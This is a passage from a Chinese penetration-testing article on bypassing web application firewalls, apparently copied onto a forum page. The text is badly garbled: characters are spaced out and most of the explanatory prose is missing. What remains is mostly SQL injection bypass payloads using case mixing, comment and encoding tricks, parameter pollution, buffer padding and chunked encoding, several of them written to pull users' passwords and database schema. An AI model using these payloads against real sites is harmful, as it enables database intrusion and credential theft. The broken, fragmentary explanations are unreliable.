[18164] 2020-10-16_渗透测试之浅析WAF绕过

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2020-10-16_渗透测试之浅析WAF绕过 W A F T r u e B W   H A C K   2 0 2 0 - 1 0 - 1 6 T r u e B W h t t p s : / / b l o g . c s d n . n e t / w e i x i n _ 3 9 1 9 0 8 9 7 W A F     W e b   A p p l i c a t i o n   F i r e w a l l   ( W E B   )   F i r e w a l l   ( )   W A F   W A F H T T P / H T T P S W e b W A F 1 0 0 % W A F 1 .   W A F 绿 W A F 2 .   W A F 3 .   W A F W A F W A F W A F 1 .   2 .  
3 .   使 4 .   使 5 .   6 .   7 .   8 .   / e x p r e s s / i   1 W A F u n i o n 使 U n i o n U n I o N 1 s e l e c t u n i o n 1 S e L S e s e l e c t l e C T e c T 2 a n d o r 使 = 使 z . c o m / i n d e x . p h p ? p a g e _ i d = - 1 5   u N I o N   s E L e c T   1 , 2 , 3 , 4   z . c o m / i n d e x . p h p ? p a g e _ i d = - 1 5   U N I u n i o n O N   S E L s e l e c t E C T   1 , 2 , 3 , 4 & & | |
使 使   m y s q l s q l s e r v e r 3 W A F M y s q l m s s q l 使 使 1 U R L C h r o m e U R L U R L U R L < > % 2 0   % 0 9   % 0 a   % 0 b   % 0 c   % 0 d   % a 0   / * * / % 0 a / * * / / * * / + % 2 0 % 2 7 % 2 8 % 2 9
1 2 3 2 1 2 使 3 U n i c o d e U n i c o d e :   % u 0 0 2 7 % u 0 0 2 0 % u 0 0 2 8 % u 0 0 2 9 使 使 使 1 1 p a g e . p h p ? i d = ? i d = 1 / * * / U N I O N / * * / S E L E C T : p a g e . p h p ? i d = 1 % 2 5 2 f % 2 5 2 a * / U N I O N % 2 5 2 f % 2 5 2 a * / S E L E C T   z . c o m / i n d e x . p h p ? p a g e _ i d = - 1 5 / * ! u % 6 e i o n * /   / * ! s e % 6 c e c t * /   1 , 2 , 3 , 4   S E L E C T ( e x t r a c t v a l u e ( 0 x 3 C 6 1 3 E 6 1 6 4 6 D 6 9 6 E 3 C 2 F 6 1 3 E , 0 x 2 f 6 1 ) ) / / ,   - -   ,   / * * / ,   # ,   - - + , - -   - ,   ; - - a z . c o m / i n d e x . p h p ? p a g e _ i d = - 1 5   % 5 5 n I O N / * * / % 5 3 E l e c T   1 , 2 , 3 , 4       ' u n i o n % a 0 s e l e c t   p a s s   f r o m   u s e r s #
2 2 M y S Q L ( ) 1 2 使 使 便 使 H P P ( H T T P   P a r a m e t e r   P o l u t i o n ) W e b / * * / # - - + / ! * * / / * * / i n d e x . p h p ? p a g e _ i d = - 1 5   / * ! U N I O N * /   / * ! S E L E C T * /   1 , 2 , 3 ? p a g e _ i d = n u l l % 0 A / * * / / * ! 5 0 0 0 0 % 5 5 n I O n * / / * y o y u * / a l l / * * / % 0 A / * ! % 5 3 e L E c t * / % 0 A / * n n a a * / + / * ? u i d = 1 & u i d = 2 & u i d = 3
1 2 3 W A F W A F W A F C C W A F b u g 1 0 x A A " 1 0 0 0 1 0 0 0 1 .   W A F W A F H T T P   P O S T P O S T s q l b y p a s s 2 .   W A F W A F W A F W A F p a y l o a d 使 W A F W A F 使 使 / ? i d = 1 ; s e l e c t + 1 , 2 , 3 + f r o m + u s e r s + w h e r e + i d = 1 / ? i d = 1 ; s e l e c t + 1 & i d = 2 , 3 + f r o m + u s e r s + w h e r e + i d = 1 / ? i d = 1 / * * / u n i o n / * & i d = * / s e l e c t / * & i d = * / p w d / * & i d = * / f r o m / * & i d = * / u s e r s ? i d = 1   a n d   ( s e l e c t   1 ) = ( S e l e c t   0 x A * 1 0 0 0 ) + U n I o N + S e L e C T + 1 , 2 , v e r s i o n ( ) , 4 , 5 , d a t a b a s e 0 x A * 1 0 0 0
1 2 3 w i n 1 0 p h p s t u d y + h t t p a n d   o r p h p i d = 1 / * ! U n I o N * / + S e L e C T + 1 , 2 , c o n c a t ( / * ! t a b l e _ n a m e * / ) + F r O M   / * ! i n f o r m a t i o n _ s c h e m a * / ? i d = - 7 2 5 + / * ! U N I O N * / + / * ! S E L E C T * / + 1 , G r O U p _ C O n C a T ( C O L U M N _ N A M E ) , 3 , 4 , 5 + F R O M + / * ! I N F O R M A T I O N _ S C H E M i n d e x . p h p ? p a g e _ i d = - 1 5 + a n d + ( s e l e c t   1 ) = ( S e l e c t   0 x A A [ . . ( a d d   a b o u t   1 0 0 0   " A " ) . . ] ) + / *
1 2 3 4 5 6 7 8 9 1 0 p o s t g e t a n d S Q L < ? p h p h e a d e r ( " C o n t e n t - T y p e :   t e x t / h t m l ; c h a r s e t = u t f - 8 " ) ; $ i d   =   $ _ R E Q U E S T [ " i d " ] ; i f   ( $ i d ) {         e c h o   " i d "   .   $ i d ;         } e l s e {         e c h o   " N o   i d " ; } ? > $ _ R E Q U E S T
h t t p C o n t e n t - L e n g t h C o n t e n t - L e n g t h C o n t e n t - L e n g t h H T T P   1 . 1 h e a d e r     C o n t e n t - L e n g t h 0 0 ? C R L F r n   C R L F   0 p o s t i d = 1 2 3 4 5 5 b u r p r e p e a t e r c o n t e n t - l e n g t h C o n t e n t - L e n g t h i d T r a n s f e r - E n c o d i n g :   c h u n k e d
使 C o n t e n t - L e n g t h 0 ( ) W A F H T T P p a y l o a d W A F
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则